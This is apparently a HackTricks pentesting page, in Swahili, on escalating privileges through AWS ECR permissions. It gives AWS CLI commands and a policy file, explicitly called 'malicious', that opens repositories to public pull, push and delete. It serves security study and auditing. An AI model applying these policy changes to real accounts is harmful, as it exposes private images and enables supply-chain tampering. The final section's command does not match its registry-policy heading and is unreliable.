AWS - ECR Privesc

Support HackTricks

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Mshambuliaji mwenye ecr:GetAuthorizationToken na ecr:BatchGetImage anaweza kuingia kwenye ECR na kupakua picha.

Kwa habari zaidi kuhusu jinsi ya kupakua picha:

AWS - ECR Post Exploitation

Athari Inayowezekana: Privesc isiyo ya moja kwa moja kwa kuingilia kati taarifa nyeti katika trafiki.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Mshambuliaji mwenye ruhusa zote hizo anaweza kuingia kwenye ECR na kupakia picha. Hii inaweza kuwa na manufaa kwa kukuza mamlaka kwenye mazingira mengine ambapo picha hizo zinatumika.

Ili kujifunza jinsi ya kupakia picha mpya/kusasisha moja, angalia:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Kama sehemu iliyopita, lakini kwa maktaba za umma.

ecr:SetRepositoryPolicy

Mshambuliaji mwenye ruhusa hii anaweza kubadilisha sera ya maktaba kutoa yeye mwenyewe (au hata kila mtu) upatikanaji wa kusoma/kuandika. Kwa mfano, katika mfano huu upatikanaji wa kusoma unatolewa kwa kila mtu.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Yaliyomo ya my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Kama ilivyokuwa kwenye sehemu iliyopita, lakini kwa maktaba za umma. Mshambuliaji anaweza kurekebisha sera ya maktaba ya maktaba ya umma ya ECR ili kutoa ufikiaji wa umma usioidhinishwa au kuinua mamlaka yao.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Athari Inayowezekana: Upatikanaji usioidhinishwa wa umma kwenye hifadhi ya ECR ya Umma, kuruhusu mtumiaji yeyote kusukuma, kuvuta, au kufuta picha.

ecr:PutRegistryPolicy

Mshambuliaji mwenye idhini hii anaweza kubadilisha sera ya usajili kumpa yeye mwenyewe, akaunti yake (au hata kila mtu) upatikanaji wa kusoma/kuandika.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Support HackTricks

Last updated